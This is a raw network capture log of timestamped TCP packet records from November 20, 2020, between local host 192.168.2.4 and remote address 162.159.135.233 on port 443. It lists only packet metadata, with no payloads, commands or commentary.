                                                                                                                                                Nov 20, 2020 11:27:06.959908009 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.959916115 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959935904 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959953070 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959964991 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.959979057 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.959983110 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960000992 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960011959 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960016966 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960033894 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960042000 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960046053 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960067034 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960068941 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960084915 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960093975 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960102081 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960119009 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960133076 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960134029 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960150957 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960166931 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960175037 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960179090 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960201025 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960212946 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960218906 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960235119 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960242033 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960252047 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960263014 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960269928 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960285902 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960299015 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960302114 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960324049 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960341930 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960342884 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960362911 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960369110 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960376024 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960391998 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960407972 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960407972 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960427046 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960442066 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960444927 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960459948 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960474014 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960479975 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960499048 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960509062 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960515022 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960531950 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960539103 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960549116 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960561991 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960563898 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960581064 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960596085 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960601091 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960617065 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960633993 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960638046 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960652113 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960661888 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960668087 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960685015 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960700989 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960704088 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960719109 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960735083 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960752964 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960753918 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960772991 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960783005 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960788965 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960804939 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960814953 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960824013 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960839987 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960844040 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960856915 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960865974 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960874081 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960895061 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960907936 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960913897 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960931063 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960947990 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960947990 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.960964918 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960978031 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.960979939 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961008072 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961028099 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961035967 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961050034 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961067915 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961076975 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961083889 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961112022 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961152077 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961168051 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961184978 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961205959 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961225033 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961241007 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961246014 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961268902 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961282015 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961288929 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961311102 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961314917 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961332083 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961340904 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961361885 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961366892 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961380005 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961394072 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961414099 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961421967 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961431980 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961452007 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961464882 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961471081 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961488008 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961503983 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961508989 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961520910 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961534023 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961546898 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961551905 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961560011 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961576939 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961587906 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961599112 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961615086 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961631060 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961647034 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961663008 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961692095 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961699963 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961713076 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961740971 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961759090 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961777925 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961798906 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961801052 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961805105 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961817026 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961817980 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961833000 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961847067 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961855888 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961891890 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961908102 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961924076 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.961939096 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.961963892 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962042093 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962057114 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962073088 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962089062 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962119102 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962129116 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962138891 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962157011 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962172031 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962178946 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962188005 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962213039 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962219954 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962233067 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962250948 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962254047 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962266922 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962289095 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962297916 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962302923 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962313890 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962318897 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962341070 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962363958 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962383032 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962385893 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962405920 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962429047 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962450027 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962479115 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962481976 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962502003 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962510109 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962519884 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962538958 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962548971 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962559938 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962579966 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962579966 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962609053 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962610006 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962625980 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962641001 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962642908 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962666035 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962671995 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962682009 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962701082 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962723970 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962730885 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962739944 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962757111 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962764025 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962774038 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962790966 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962793112 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962806940 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962820053 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962825060 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962843895 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.962860107 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.962894917 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963032007 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963053942 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963072062 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963087082 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963104010 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963114977 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963123083 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963143110 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963157892 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963167906 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963184118 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963197947 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963201046 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963217974 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963228941 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963233948 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963252068 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963258982 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963268042 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963294983 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963298082 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963313103 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963325024 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963330984 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963351011 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963367939 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963368893 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963387966 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963407040 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963411093 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963429928 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963438988 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963448048 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963464022 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963478088 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963480949 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963506937 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963516951 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963526964 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963543892 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963551044 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963562012 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963577986 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963586092 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963598967 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963615894 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963615894 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963633060 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963640928 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963654041 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963670969 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963680029 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963689089 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.963718891 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.963756084 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.964271069 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964291096 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964308023 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964323044 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964332104 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.964339972 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964356899 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964365005 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.964373112 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964389086 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964404106 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964411974 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.964423895 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.964447021 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.964482069 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.977377892 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.977436066 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.977514982 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.977539062 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.978326082 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.978358984 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.978395939 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.978400946 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.978425026 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.978435040 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.978451014 CET44349747162.159.135.233192.168.2.4
                                                                                                                                                Nov 20, 2020 11:27:06.978452921 CET49747443192.168.2.4162.159.135.233
                                                                                                                                                Nov 20, 2020 11:27:06.978478909 CET49747443192.168.2.4162.159.135.233
